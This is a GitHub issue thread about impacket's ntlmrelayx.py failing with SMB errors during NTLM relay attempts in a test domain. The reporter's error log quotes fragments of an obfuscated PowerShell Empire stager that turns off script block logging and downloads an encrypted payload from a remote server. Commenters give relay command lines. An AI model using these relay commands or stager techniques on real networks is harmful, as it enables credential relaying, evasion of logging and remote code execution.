### ISSUE TITLE
Ntlmrlayx.py shows 'SMB SessionError' and throws unhandled exception

### ISSUE THREAD

**Issue by ss6851** [SecureAuthCorp/impacket#493] opened 2018-09-22 18:17 UTC
I am trying to use ntlm relaying to get domain admin in my virtual environment. However, ntlmrelayx.py first shows 'SMB SessionError' and then throws an un-handled exception.

    [*] Authenticating against smb://192.168.106.131 as SAFEDOMAIN\Administrator SUCCEED
    [*] Executed specified command on host: 192.168.106.131
    [-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
    flags are incompatible.)
    [*] Executed specified command on host: 192.168.106.131
    [-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
    flags are incompatible.)
    [*] Executed specified command on host: 192.168.106.131
    [-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
    flags are incompatible.)
    [*] Executed specified command on host: 192.168.106.131
    Method invocation failed because 
    [System.Collections.Generic.Dictionary`2[[System.String, mscorlib, 
    Version=4.0.0.0, Culture=neutral, 
    PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, 
    Culture=neutral, PublicKeyToken=b77a5c561934e089]]] does not contain a method 
    named 'nEW'.
    At line:1 char:374
    + ... ionLogging']=0}$Val=[CollectIOnS.GEneRIc.DICTioNary[sTRINg,SySTeM.OBjEct]
    ]::nEW( ...
    +                    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : MethodNotFound
 
    You cannot call a method on a null-valued expression.
    At line:1 char:441
    + ... BjEct]]::nEW();$val.ADd('EnableScriptB'+'lockLogging',0);$vAL.ADd('Enable
    ScriptB ...
    +                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
    You cannot call a method on a null-valued expression.
    At line:1 char:483
    + ... ockLogging',0);$vAL.ADd('EnableScriptBlockInvocationLogging',0);$GPC['HKE
    Y_LOCAL ...
    +                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
     Exception calling "DownloadData" with "1" argument(s): "Unable to connect to 
     the remote server"
     At line:1 char:1657
     + ... uVhm0oeKRKg=");$daTa=$WC.DoWNLoADDAta($SeR+$t);$IV=$daTa[0..3];$Data=$DAt
    a[4..$D ...
    +                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException
 
    Cannot index into a null array.
    At line:1 char:1689
    + ... 
    DDAta($SeR+$t);$IV=$daTa[0..3];$Data=$DAta[4..$DATA.LeNgTH];-jOin[ChAR[]](& $R 
    $ ...
    +                    ~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : NullArray
 
    Cannot index into a null array.
    At line:1 char:1705
    + ... IV=$daTa[0..3];$Data=$DAta[4..$DATA.LeNgTH];-jOin[ChAR[]](& $R $DAta 
    ($IV+$K))|I ...
    +                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : NullArray
 
    ~ : The term '~' is not recognized as the name of a cmdlet, function, script 
    file, or operable program. Check the spelling of the name, or if a path was 
    included, verify that the path is correct and try again.
    At line:1 char:1
    + ~
    + ~
    + CategoryInfo          : ObjectNotFound: (~:String) [], CommandNotFoundEx 
     ception
    + FullyQualifiedErrorId : CommandNotFoundException

Sometimes, for the same setup, ntlmrelay shows the following error:

    [-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an 
    object but has not been granted those access rights.)

**Comment by asolino** [comment] 2018-10-25 18:47
How are you guys executing `ntlmrelayx.py` and what `impacket` version is being used? I'm seeing output there that is not Python related.

**Comment by gfsincere** [comment] 2018-10-25 19:29
using Impacket v0.9.18-dev and the command is python ntlmrelayx.py -smb2support -tf /root/client/targets.txt -w -c "" with a powershell launcher from Empire.

**Comment by asolino** [comment] 2018-11-20 18:47
Did you try executing something simpler than a powershell launcher? Just want to understand where the problem is.

**Comment by asolino** [comment] 2019-03-15 16:47
No answer, closing

**Closed by asolino** 2019-03-15 16:47 UTC

**Comment by Anonimo501** [comment] 2021-06-01 19:51
hola.

![Screenshot_1](https://user-images.githubusercontent.com/67207446/120381764-7a994b80-c2e8-11eb-8f70-b3aadb1dd841.png)

tengo este problema de que el Administrador me esta apareciendo como FALSE y necesito que me aparezca en TRUE por favor ayuda el comando que estoy usando es el siguiente: ntlmrelayx.py -6 -wh 192.168.1.72 -t smb://192.168.1.56 -l ~/tmp -socks -debug.

la version de impacket es la ultima hasta el momento ya que lo descargue del repositorio original el dia de hoy.

Si alguien puede ayudar muchas gracias.

**Comment by DamiPerezz** [comment] 2023-12-18 11:22
Someone here solved this issue? (I have the same )

**Comment by morpheuslord** [comment] 2024-08-08 17:12
does anyone have the solution
